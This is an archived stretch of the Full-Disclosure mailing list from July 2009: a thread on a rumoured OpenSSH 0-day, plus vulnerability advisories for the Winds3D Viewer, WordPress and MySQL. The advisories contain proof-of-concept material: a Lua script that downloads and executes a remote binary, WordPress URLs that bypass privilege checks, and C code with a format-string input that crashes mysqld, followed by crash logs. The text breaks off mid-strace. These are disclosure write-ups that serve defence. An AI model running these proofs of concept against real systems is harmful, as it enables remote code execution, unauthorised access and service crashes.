Wed, Jul 8, 2009 at 1:00 PM, Martin Spinassi wrote: > Hi list, > > > I've been reading around (openssh mailing list, some forums, etc.) a > rumor about a 0-day exploit in openssh. Does anybody knows if there is > *really* something like this in the wild? > > > Cheers > > > Martin > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090708/651b5e58/attachment.html From alpkaiser at gmail.com Wed Jul 8 21:58:12 2009 From: alpkaiser at gmail.com (Anderson Kaiser) Date: Wed, 8 Jul 2009 17:58:12 -0300 Subject: [Full-disclosure] [Rumor] SSH 0-day In-Reply-To: <1247083217.11750.14.camel@kr0sty.livra.local> References: <1247083217.11750.14.camel@kr0sty.livra.local> Message-ID: <527eb3030907081358i7047bfacodb039ad0905af2ce@mail.gmail.com> 2009/7/8 Martin Spinassi : > Hi list, > > > I've been reading around (openssh mailing list, some forums, etc.) a > rumor about a 0-day exploit in openssh. Does anybody knows if there is > *really* something like this in the wild? > > > Cheers > > > Martin > This attack sounds more like a brute-force attack than a 0-day. You can see it in the original post. -- Anderson Kaiser alpkaiser at gmail.com Linux User #: 426240 From advisories at coresecurity.com Wed Jul 8 21:59:17 2009 From: advisories at coresecurity.com (CORE Security Technologies Advisories) Date: Wed, 08 Jul 2009 17:59:17 -0300 Subject: [Full-disclosure] CORE-2009-0519 - Awingsoft Awakening Winds3D Viewer remote command execution vulnerability Message-ID: <4A5508A5.9010603@coresecurity.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ~ Core Security Technologies - CoreLabs Advisory ~ http://www.coresecurity.com/corelabs/ Awingsoft Awakening Winds3D Viewer remote command execution vulnerability 1. *Advisory Information* Title: Awingsoft Awakening Winds3D Viewer remote command execution vulnerability Advisory ID: CORE-2009-0519 Advisory URL: http://www.coresecurity.com/content/winds3d-viewer-advisory Date published: 2009-07-08 Date of last update: 2009-07-08 Vendors contacted: Awingsoft Release mode: User release 2. *Vulnerability Information* Class: Remote command execution Remotely Exploitable: Yes (client side) Locally Exploitable: No Bugtraq ID: 35595 CVE Name: CVE-2009-2386 3. *Vulnerability Description* Awingsoft's Awakening is a rapid application authoring tool for efficiently creating interactive 3D content. With this tool, you can easily create interactive 3D presentations, animated 3D webs, brief films or games. Awakening's Winds3D Viewer [1], which runs as a plugin within most popular web browsers, is vulnerable to a remotely exploitable arbitrary command execution vulnerability which can be triggered by making the user visit a malicious link/website. 4. *Vulnerable packages* ~ . Winds3D Viewer v3.5.0.0 ~ . Winds3D Viewer v3.0.0.5 ~ . Older versions are probably affected too, but were not checked. 5. *Vendor Information, Solutions and Workarounds* The vendor did not provide fixes or workaround information. A possible mitigation action would be to enable MIME type filtering in your IDS/proxies and block Winds3D traffic: 'application/x-awingsoft-winds3d' As a workaround, vulnerable users can also avoid this flaw by disabling the Winds3D Plugin in their web browsers: 5.1. *Mozilla Firefox* ~ . Go to the Tools menu, and select Options... ~ . Click on the Main tab ~ . Click on the Manage Add-ons... ~ . Disable Winds3D Plugin 5.2. *Internet Explorer* ~ . Set the kill bit for control *17A54E7D-A9D4-11D8-9552-00E04CB09903* (as explained in http://support.microsoft.com/kb/240797). 5.3. *Opera* ~ . Browse opera:plugins ~ . Look for "Winds3D Plugin for Mozilla" ~ . Delete the associated file. Please contact Awingsoft for further information, patches and workarounds. 6. *Credits* This vulnerability was discovered and researched by Diego Juarez from Core Security Technologies. 7. *Technical Description / Proof of Concept Code* 7.1. *Introduction* The vulnerability comes from the way the scripting interface exposes filesystem access and in particular the way it implements the GetURL method: /----------- GetURL(string URL) Description: Open browser to visit assigned URL returns: None - -----------/ In the current implementation, calling GetURL will ultimately execute the equivalent of calling 'ShellExecute(NULL, "open", URL, 0, 0, SW_SHOW);'. Note that the attacker only controls the file to open (execute), but not the command line parameters. This, however, coupled with the scripting interface's ability to download arbitrary files to arbitrary paths constitutes a remotely exploitable arbitrary code execution vulnerability which can be triggered by making the user visit a malicious link/website. 7.2. *Proof of concept* The following script (.usr) demonstrates the vulnerability. It downloads a malicious binary file to the victim machine and then executes it. /----------- - -- download require 'scripts\\websession' require 'scripts\\webfile' - -- evil file to download local szURL='http://somesite/exploit.exe' - -- setup download evil file from the web ses=websession.new() file=ses.openURL(szURL) local destfilename=GetTempFileName() -- we always want to download to the %TEMP% directory (write access = sure thing) destfilename=string.gsub(destfilename, ".tmp", ".exe") -- rename to something shellexecute will launch file.setDestFile(destfilename) local filesize=file.seek(0,FILE_END) file.seek(0,FILE_BEGIN) local bytescount=0 local readbytes=file.read() while (readbytes>0) do bytescount=bytescount + readbytes readbytes=file.read() end - -- close the descriptors file.release() ses.release() - -- execute GetURL(destfilename) - -----------/ 8. *Report Timeline* . 2009-05-19: Core Security Technologies notifies Awingsoft of the vulnerability (no reply received). . 2009-06-29: Core notifies again Awingsoft of the vulnerability (no reply received). . 2009-07-08: Since Awingsoft did not respond any notification, Core decides to publish the advisory CORE-2009-0519 as "User release". 9. *References* [1] Awingsoft's Awakening viewer (AKA Winds3D viewer) http://www.awingsoft.com/web3d/web3d.htm 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkpVCKUACgkQyNibggitWa0tLACfTRppFDPNm6DnwqzSGNflLXHO RGkAnic/M9juNT6l18s2Rgb92SJSMqia =MoU+ -----END PGP SIGNATURE----- From advisories at coresecurity.com Wed Jul 8 23:34:08 2009 From: advisories at coresecurity.com (Core Security Technologies Advisories) Date: Wed, 08 Jul 2009 19:34:08 -0300 Subject: [Full-disclosure] CORE-2009-01515 - WordPress Privileges Unchecked in admin.php and Multiple Information Message-ID: <4A551EE0.3010303@coresecurity.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ WordPress Privileges Unchecked in admin.php and Multiple Information Disclosures 1. *Advisory Information* Title: WordPress Privileges Unchecked in admin.php and Multiple Information Disclosures Advisory ID: CORE-2009-0515 Advisory URL: http://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked Date published: 2009-07-08 Date of last update: 2009-07-08 Vendors contacted: WordPress Release mode: Coordinated release 2. *Vulnerability Information* Class: Local file include, Privileges unchecked, Cross site scripting (XSS), Information disclosure Remotely Exploitable: Yes Locally Exploitable: No Bugtraq ID: 35581, 35584 CVE Name: CVE-2009-2334, CVE-2009-2335, CVE-2009-2336 3. *Vulnerability Description* WordPress is a web application written in PHP that allows the easy installation of a flexible weblog on any computer connected to the Internet. WordPress 2.7 reached more than 6 million downloads during June 2009 [9]. A vulnerability was found in the way that WordPress handles some URL requests. This results in unprivileged users viewing the content of plugins configuration pages, and also in some plugins modifying plugin options and injecting JavaScript code. Arbitrary native code may be run by a malicious attacker if the blog administrator runs injected JavasScript code that edits blog PHP code. Many WordPress-powered blogs, hosted outside 'wordpress.com', allow any person to create unprivileged users called subscribers. Other sensitive username information disclosures were found in WordPress. 4. *Vulnerable packages* . WordPress 2.8 and previous . WordPress MU 2.7.1 and previous, used in WordPress.com 5. *Non-vulnerable packages* . WordPress 2.8.1 . WordPress MU 2.8.1, used in WordPress.com 6. *Vendor Information, Solutions and Workarounds* Mitigation for the Privileges Unchecked vulnerability (suggested by Core Security): this vulnerability may be mitigated by controlling access to files inside the 'wp-admin' folder. Access can be prohibited by using Apache access control mechanism ('.htaccess' file), see guideline for more information [11]. 7. *Credits* These vulnerabilities were discovered and researched by Fernando Arnaboldi and Jos? Orlicki from Core Security Technologies. Further research was made by Jose Orlicki from Core Security Technologies. 8. *Technical Description / Proof of Concept Code* 8.1. *Introduction* In the last few years several security bugs were found in WordPress [1][2]. During 2008, the big amount of bugs reported by researchers lead to exploitation by blog spammers [3]. During 2009, a new round of attacks has appeared and security researchers are reporting new bugs or wrongly fixed previously-reported bugs [4][5]. A path traversal in local files included by 'admin.php' has been fixed [6][7] but, in our case, we report that administrative privileges are still unchecked when accessing any PHP file inside a plugin folder. 8.2. *Access Control Roles* WordPress has a privilege model where any user has an assigned role [8]. Regarding plugins only users characterized by the role Administrator can activate plugins. Notice that only the blog hosting owner can add new plugins because these must by copied inside the host filesystem. The roles Editor, Author or Subscriber (the latter has the least privileges) cannot activate plugins, edit plugins, update plugins nor delete plugins installed by an Administrator. Besides that, the configuration of specific plugins is a grey area because there is no distinguished capability assigned [8]. Also due to cross-site scripting vulnerabilities inside plugins options (something very common), non-administrative users reconfiguring plugins may inject persistent JavaScript code. Possibly arbitrary native code can be executed by the attacker if the blog administrator runs injected JavasScript code that injects PHP code. It is important to observe that many WordPress-powered blogs are configured to allow any blog visitor to create a Subscriber user without confirmation from the Administrator role inside the following URL, although by default the Administrator role must create these new users. /----------- http://[some_wordpress_blog]/wp-login.php?action=register - -----------/ This can be modified by the administrator in 'Membership/Anyone can register'. /----------- http://[some_wordpress_blog]/wp-admin/options-general.php - -----------/ 8.3. *Privileges Unchecked in admin.php?page= Plugin Local File Includes (CVE-2009-2334, BID 35581)* No privileges are checked on WordPress plugins configuration PHP modules using parameter 'page' when we replace 'options-general.php' with 'admin.php'. The same thing happens when replacing other modules such as 'plugins.php' with 'admin.php'. Basic information disclosure is done this way. For example, with the following URL a user with no privileges can see the configuration of plugin Collapsing Archives, if installed. /----------- http://[some_wordpress_blog]/wp-admin/admin.php?page=/collapsing-archives/options.txt - -----------/ Instead of the following allowed URL. /----------- http://[some_wordpress_blog]/wp-admin/options-general.php?page=collapsing-archives/options.txt - -----------/ Another example of this information disclosure is shown on Akismet, a plugin shipped by default with WordPress. /----------- http://[some_wordpress_blog]/wp-admin/admin.php?page=akismet/readme.txt - -----------/ All plugins we have tested are vulnerable to this kind of information disclosure, but in many of them the PHP files accessed just crashed. On the other hand, for example, with capability 'import', privileges are checked inside 'admin.php': /----------- if ( ! current_user_can('import') ) wp_die(__('You are not allowed to import.')); - -----------/ More dangerous scenarios exist, all of them can be exploited by users with the Subscriber role, the least privileged. 8.4. *Abuse example: XSS in plugin configuration module* If installed, *Related Ways To Take Action* is an example of a WordPress plugin that is affected by many cross-site scripting vulnerabilities (XSS) that can be leveraged by an attacker using the unchecked privileges described in this advisory to inject persistent JavaScript code. Possibly, arbitrary native code can be executed by the attacker if the blog administrator, when he/she logs in, runs injected JavasScript code that edits blog PHP code. The original URL for reconfiguring the plugin can be accessed only by the Administrator role. /----------- http://[some_wordpress_blog]/wordpress/wp-admin/options-general.php?page=related-ways-to-take-action/options.php - -----------/ But replacing the PHP file with the generic 'admin.php' any blog user can modify this configuration. /----------- http://[some_wordpress_blog]/wp-admin/admin.php?page=related-ways-to-take-action/options.php - -----------/ The following JavaScript injection can be entered within field *Exclude actions by term* to exemplify this kind of abuse. When the administrator enters the same page the injected browser code will be executed and possibly blog PHP can be modified to run arbitrary native code. /----------- \"/>June 3rd, 2009 - -----------/ Also several administrative modules give to anyone the complete path where the web application is hosted inside the server. This may simplify or enable other malicious attacks. An example follows. /----------- http://[some_wordpress_blog]/wp-settings.php - -----------/ /----------- Notice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in [WP_LEAKED_PATH]\wp-settings.php on line 110 Notice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in [WP_LEAKED_PATH]\wp-settings.php on line 112 Warning: require(ABSPATHwp-includes/compat.php) [function.require]: failed to open stream: No such file or directory in [WP_LEAKED_PATH]\wp-settings.php on line 246 Fatal error: require() [function.require]: Failed opening required 'ABSPATHwp-includes/compat.php' (include_path='.;[PHP_LEAKED_PATH]\php5\pear') in [WP_LEAKED_PATH]\wp-settings.php on line 246 - -----------/ 9. *Report Timeline* . 2009-06-04: Core Security Technologies notifies the WordPress team of the vulnerabilities (security at wordpress.org) and offers a technical description encrypted or in plain-text. Advisory is planned for publication on June 22th. . 2009-06-08: Core notifies again the WordPress team of the vulnerability. . 2009-06-10: The WordPress team asks Core for a technical description of the vulnerability in plain-text. . 2009-06-11: Technical details sent to WordPress team by Core. . 2009-06-11: WordPress team notifies Core that a fix was produced and is available to Core for testing. WordPress team asserts that password and username discrimination as well as username leakage are known and will not be fixed because they are convenient for the users. . 2009-06-12: Core tells the WordPress team that the patch will be tested by Core as a courtesy as soon as possible. It also requests confirmation that WordPress versions 2.8 and earlier, and WordPress.com, are vulnerable to the flaws included in the advisory draft CORE-2009-0515. . 2009-06-12: WordPress team confirms that WordPress 2.8 and earlier plus WordPress.com are vulnerable to the flaws included in the advisory draft. . 2009-06-17: Core informs the WordPress team that the patch is only fixing one of the four proof of concept abuses included in the advisory draft. Core reminds the WordPress team that the advisory is scheduled to be published on June 22th but a new schedule can be discussed. . 2009-06-19: Core asks for a new patched version of WordPress, if available, and notifies the WordPress team that the publication of the advisory was re-scheduled to June 30th. . 2009-06-19: WordPress team confirms they have a new patch that has the potential to break a lot of plugins. . 2009-06-29: WordPress team asks for a delayance on advisory CORE-2009-0515 publication until July 6th, when WordPress MU version will be patched. . 2009-06-29: Core agrees to delay publication of advisory CORE-2009-0515 until July 6th. . 2009-06-29: Core tells the WordPress team that other administrative PHP modules can also be rendered by non-administrative users, such as module 'admin-post.php' and 'link-parse-opml.php'. . 2009-07-02: WordPress team comments that 'admin.php' and 'admin-post.php' are intentionally open and plugins can choose to hook either privileged or unprivileged actions. They also comment that unprivileged access to 'link-parse-opml.php' is benign but having this file open is bad form. . 2009-07-02: Core sends the WordPress team a new draft of the advisory and comments that there is no capability specified in Worpress documentation for configuring plugins. Also control of actions registered by plugins is not enforced. Core also notices that the privileges unchecked bug in 'admin.php?page=' is fixed on WordPress 2.8.1-beta2 latest development release. . 2009-07-06: Core requests WordPress confirmation of the release date of WordPress 2.8.1 and WordPress MU 2.8. . 2009-07-07: WordPress team confirms that a release candidate of WordPress 2.8.1 is made available to users and that the advisory may be published. . 2009-07-06: Core requests WordPress confirmation of the release date of WordPress MU and WordPress MU new version numbers. . 2009-07-07: WordPress team release WordPress 2.8.1 RC1 to its users. . 2009-07-08: WordPress team confirms that WordPress MU 2.8.1 will be made available as soon WordPress 2.8.1 is officially released. Probably July 8th or 9th. . 2009-07-08: The advisory CORE-2009-0515 is published. 10. *References* [1] WordPress vulnerabilities in CVE database http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress [2] SecuriTeam List of WordPress Vulnerabilities http://www.securiteam.com/products/W/Wordpress.html [3] WordPress Vulnerability - YBO Interactive Blog http://www.ybo-interactive.com/blog/2008/03/30/wordpress-vulnerability/ [4] bablooO/blyat attacks on WP 2.7.0 and 2.7.1 http://wordpress.org/support/topic/280748 [5] Security breach - xkcd blog http://blag.xkcd.com/2009/06/18/security-breach/ [6] securityvulns.com WordPress vulnerabilities digest in English http://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded [7] CVE-2008-0196 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0196 [8] WordPress Roles and Capabilities http://codex.wordpress.org/Roles_and_Capabilities [9] WordPress Download Counter http://wordpress.org/download/counter/ [10] WordPress Intrusion Detection System Plugin http://php-ids.org/2008/02/21/wpids-version-012-released/ [11] Hardening WordPress with htaccess http://blogsecurity.net/wordpress/article-210607 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKVR7gyNibggitWa0RAin3AKCOrLLQ8XZnrCLot5d9xoZW6sdWwwCfTJ4N TPRpR0Gn0WqmF8HOeDslbA8= =zEDK -----END PGP SIGNATURE----- From kcope2 at googlemail.com Thu Jul 9 00:01:16 2009 From: kcope2 at googlemail.com (Kingcope) Date: Thu, 9 Jul 2009 01:01:16 +0200 Subject: [Full-disclosure] MySQL <= 5.0.45 post auth format string vulnerability Message-ID: <72f8221d0907081601g55bbba3eobcbdb3e0b7474246@mail.gmail.com> MySQL (tested: Version 5.0.45 on CentOS (Linux)) Format String Vulnerability MySQL General Available (GA) Release is vulnerable. Latest MySQL Version is not vulnerable since the bug if ifdef'ed off. from mysql-5.0.75 source (mysql-5.0.75.tar.gz) in the file libmysqld/sql_parse.cc this source code is also included in mysql-4.0.0, mysql versions >= 4.0.0 are affected. function prototype: write(THD *thd, enumenum_server_command command, const char* format, ...) function call: write(thd, command, packet); on line 2084: case COM_CREATE_DB: // QQ: To be removed { char *db=thd->strdup(packet), *alias; HA_CREATE_INFO create_info; statistic_increment(thd->status_var.com_stat[SQLCOM_CREATE_DB], &LOCK_status); // null test to handle EOM if (!db || !(alias= thd->strdup(db)) || check_db_name(db)) { my_error(ER_WRONG_DB_NAME, MYF(0), db ? db : "NULL"); break; } if (check_access(thd,CREATE_ACL,db,0,1,0,is_schema_db(db))) break; [1] mysql_log.write(thd,command,packet); bzero(&create_info, sizeof(create_info)); mysql_create_db(thd, (lower_case_table_names == 2 ? alias : db), &create_info, 0); break; } line 2105: case COM_DROP_DB: // QQ: To be removed { statistic_increment(thd->status_var.com_stat[SQLCOM_DROP_DB], &LOCK_status); char *db=thd->strdup(packet); /* null test to handle EOM */ if (!db || check_db_name(db)) { my_error(ER_WRONG_DB_NAME, MYF(0), db ? db : "NULL"); break; } if (check_access(thd,DROP_ACL,db,0,1,0,is_schema_db(db))) break; if (thd->locked_tables || thd->active_transaction()) { my_message(ER_LOCK_OR_ACTIVE_TRANSACTION, ER(ER_LOCK_OR_ACTIVE_TRANSACTION), MYF(0)); break; } [2] mysql_log.write(thd,command,db); mysql_rm_db(thd, db, 0, 0); break; } at [1] and [2] there is a call to mysql_log.write() without format string specifiers leading to a format string bug. authentication is required. COM_CREATE_DB and COM_DROP_DB are "legacy" code. Recent clients does not use this functions to create and drop databases. Older clients do. Even Newest GA version of mysqld is able to handle the requests though. mysql logging has to be enabled. it seems acls are enforced, so create db or drop db privs may be required, though untested. --> my.cnf at [mysqld] log=/var/log/mysql.log for example PROOF OF CONCEPT WHICH CRASHES MYSQLD FOLLOWS MYSQLD RESTARTS IMMEDIATELY CAUSE: SIGNAL SEGV ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ---snip--- #include #include #define USE_OLD_FUNCTIONS #include #define NullS (char *) 0 int main (int argc, char **argv) { MYSQL *mysql = NULL; mysql = mysql_init (mysql); if (!mysql) { puts ("Init faild, out of memory?"); return EXIT_FAILURE; } if (!mysql_real_connect (mysql, /* MYSQL structure to use */ "localhost", /* server hostname or IP address */ "monty", /* mysql user */ "montypython", /* password */ NULL, /* default database to use, NULL for none */ 0, /* port number, 0 for default */ NULL, /* socket file or named pipe name */ CLIENT_FOUND_ROWS /* connection flags */ )) { puts ("Connect failed\n"); } else { puts ("Connect OK\n"); // mysql_create_db(mysql, "%s%s%s%s%s"); simple_command(mysql, COM_CREATE_DB, argv[1], strlen(argv[1]), 0); } mysql_close (mysql); return EXIT_SUCCESS; } ---snip--- reproduce: $gcc mysql_format.c -o mysql_format -lmysqlclient $./mysql_format %s%s%s%s%s Debugging output follows - Crashdump and strace output ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Version: '5.0.45-log' socket: '/var/lib/mysql/mysql.sock' port: 3306 Source distribution 090620 1:53:52 - mysqld got signal 11; This could be because you hit a bug. It is also possible that this binary or one of the libraries it was linked against is corrupt, improperly built, or misconfigured. This error can also be caused by malfunctioning hardware. We will try our best to scrape up some info that will hopefully help diagnose the problem, but since we have already crashed, something is definitely wrong and this may fail. key_buffer_size=8388600 read_buffer_size=131072 max_used_connections=1 max_connections=100 threads_connected=1 It is possible that mysqld could use up to key_buffer_size + (read_buffer_size + sort_buffer_size)*max_connections = 225791 K bytes of memory Hope that's ok; if not, decrease some variables in the equation. thd=0x8aea8a8 Attempting backtrace. You can use the following information to find out where mysqld died. If you see no messages after this, something went terribly wrong... Cannot determine thread, fp=0xb038d7ec, backtrace may not be correct. Stack range sanity check OK, backtrace follows: 0x8187393 0xb7be8afb 0x8208dc4 0x81a55e2 0x81a58b7 0x81a6487 0xb7e2a33a 0xb7c4b5ce New value of fp=(nil) failed sanity check, terminating stack trace! Please read http://dev.mysql.com/doc/mysql/en/using-stack-trace.html and follow instructions on how to resolve the stack trace. Resolved stack trace is much more helpful in diagnosing the problem, so please do resolve it Trying to get some variables. Some pointers may be invalid and cause the dump to abort... thd->query at (nil) is invalid pointer thd->thread_id=1 The manual page at http://www.mysql.com/doc/en/Crashing.html contains information that should help you find out what is causing the crash. Number of processes running now: 0 090620 01:53:52 mysqld restarted 090620 1:53:52 InnoDB: Started; log sequence number 0 4876777 090620 1:53:52 [Note] /usr/libexec/mysqld: ready for connections. Version: '5.0.45-log' socket: '/var/lib/mysql/mysql.sock' port: 3306 Source distribution ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 26454 futex(0x8a6ff90, FUTEX_WAIT, 1, NULL 26453 select(14, [11 13], NULL, NULL, NULL 26455 futex(0x8a70000, FUTEX_WAIT, 5, NULL 26456 futex(0x8a70070, FUTEX_WAIT, 3, NULL 26457 futex(0x8a700e0, FUTEX_WAIT, 1, NULL 26459 select(0, NULL, NULL, NULL, {0, 55000} 26460 select(0, NULL, NULL, NULL, {0, 953000} 26461 futex(0x872a630, FUTEX_WAIT, 1, NULL 26462 rt_sigtimedwait([HUP QUIT ALRM TERM TSTP], 26463 futex(0x86e2044, FUTEX_WAIT, 1, NULL 26459 <... select resumed> ) = 0 (Timeout) 26459 time(NULL) = 1245456538 26459 select(0, NULL, NULL, NULL, {1, 0} 26460 <... select resumed> ) = 0 (Timeout) 26460 time(NULL) = 1245456538 26460 select(0, NULL, NULL, NULL, {2, 0} 26459 <... select resumed> ) = 0 (Timeout) 26459 time(NULL) = 1245456539 26459 select(0, NULL, NULL, NULL, {1, 0}) = 0 (Timeout) 26459 time(NULL) = 1245456540 26459 select(0, NULL, NULL, NULL, {1, 0} 26460 <... select resumed> ) = 0 (Timeout) 26460 time(NULL) = 1245456540 26460 select(0, NULL, NULL, NULL, {2, 0} 26459 <... select resumed> ) = 0 (Timeout) 26459 time(NULL) = 1245456541 26459 select(0, NULL, NULL, NULL, {1, 0}) = 0 (Timeout) 26459 time(NULL) = 1245456542 26459 select(0, NULL, NULL, NULL, {1, 0} 26460 <... select resumed> ) = 0 (Timeout) 26460 time(NULL) = 1245456542 26460 select(0, NULL, NULL, NULL, {2, 0} 26459 <... select resumed> ) = 0 (Timeout) 26459 time(NULL) = 1245456543 26459 select(0, NULL, NULL, NULL, {1, 0}) = 0 (Timeout) 26459 time(NULL) = 1245456544 26459 time(NULL) = 1245456544 26459 select(0, NULL, NULL, NULL, {1, 0} 26460 <... select resumed> ) = 0 (Timeout) 26460 time(NULL) = 1245456544 26460 select(0, NULL, NULL, NULL, {2, 0} 26459 <... select resumed> ) = 0 (Timeout) 26459 time(NULL) = 1245456545 26459 select(0, NULL, NULL, NULL, {1, 0}) = 0 (Timeout) 26459 time(NULL) = 1245456546 26459 select(0, NULL, NULL, NULL, {1, 0} 26460 <... select resumed> ) = 0 (Timeout) 26460 time(NULL) = 1245456546 26460 select(0, NULL, NULL, NULL, {2, 0} 26459 <... select resumed> ) = 0 (Timeout) 26459 time(NULL) = 1245456547 26459 select(0, NULL, NULL, NULL, {1, 0} 26453 <... select resumed> ) = 1 (in [13]) 26453 fcntl64(13, F_SETFL, O_RDWR|O_NONBLOCK) = 0 26453 accept(13, {sa_family=AF_FILE, path="??"}, [2]) = 26 26453 fcntl64(13, F_SETFL, O_RDWR) = 0 26453 getsockname(26, {sa_family=AF_FILE, path="/var/lib/mysql"}, [28]) = 0 26453 fcntl64(26, F_SETFL, O_RDONLY) = 0 26453 fcntl64(26, F_GETFL) = 0x2 (flags O_RDWR) 26453 fcntl64(26, F_SETFL, O_RDWR|O_NONBLOCK) = 0 26453 setsockopt(26, SOL_IP, IP_TOS, [8], 4) = -1 EOPNOTSUPP (Operation not supported) 26453 time(NULL) = 1245456547 26453 mmap2(NULL, 200704, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb035e000 26453 mprotect(0xb035e000, 4096, PROT_NONE) = 0 26453 clone(child_stack=0xb038e494, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, parent_tidptr=0xb038ebd8, {entry_number:6, base_addr:0xb038eb90, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}, child_tidptr=0xb038ebd8) = 16147 26453 select(14, [11 13], NULL, NULL, NULL 16147 time(NULL) = 1245456547 16147 rt_sigprocmask(SIG_UNBLOCK, [], [HUP INT QUIT PIPE ALRM TERM TSTP], 8) = 0 16147 setsockopt(26, SOL_SOCKET, SO_KEEPALIVE, [1], 4) = 0 16147 write(26, "8\0\0\0\n5.0.45-log\0\1\0\0\0]/mZZ46R\0,\242\300"..., 60) = 60 16147 read(26, 0x8b19ae0, 4) = -1 EAGAIN (Resource temporarily unavailable) 16147 time(NULL) = 1245456547 16147 rt_sigprocmask(SIG_BLOCK, ~[RTMIN RT_1], [HUP INT QUIT PIPE ALRM TERM TSTP], 8) = 0 16147 tgkill(26453, 26462, SIGALRM) = 0 26462 <... rt_sigtimedwait resumed> 0, 0, 8) = 14 16147 rt_sigprocmask(SIG_SETMASK, [HUP INT QUIT PIPE ALRM TERM TSTP], 26462 rt_sigprocmask(SIG_SETMASK, ~[RTMIN RT_1], 16147 <... rt_sigprocmask resumed> NULL, 8) = 0 26462 <... rt_sigprocmask resumed> [HUP INT QUIT PIPE ALRM TERM TSTP], 8) = 0 16147 fcntl64(26, F_SETFL, O_RDWR 26462 time( 16147 <... fcntl64 resumed> ) = 0 26462 <... time resumed> NULL) = 1245456547 16147 read(26, 26462 alarm(5) = 0 26462 rt_sigprocmask(SIG_SETMASK, [HUP INT QUIT PIPE ALRM TERM TSTP], NULL, 8) = 0 26462 rt_sigtimedwait([HUP QUIT ALRM TERM TSTP], 16147 <... read resumed> "&\0\0\1", 4) = 4 16147 read(26, "\207\242\0\0\0\0\0@\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 38) = 38 16147 rt_sigprocmask(SIG_BLOCK, ~[RTMIN RT_1], [HUP INT QUIT PIPE ALRM TERM TSTP], 8) = 0 16147 rt_sigprocmask(SIG_SETMASK, [HUP INT QUIT PIPE ALRM TERM TSTP], NULL, 8) = 0 16147 fcntl64(26, F_SETFL, O_RDWR|O_NONBLOCK) = 0 16147 time(NULL) = 1245456547 16147 write(3, "090620 2:09:07\t 1 Connect "..., 55) = 55 16147 write(26, "\7\0\0\2\0\0\0\2\0\0\0", 11) = 11 16147 time(NULL) = 1245456547 16147 read(26, 0x8b19ae0, 4) = -1 EAGAIN (Resource temporarily unavailable) 16147 time(NULL) = 1245456547 16147 rt_sigprocmask(SIG_BLOCK, 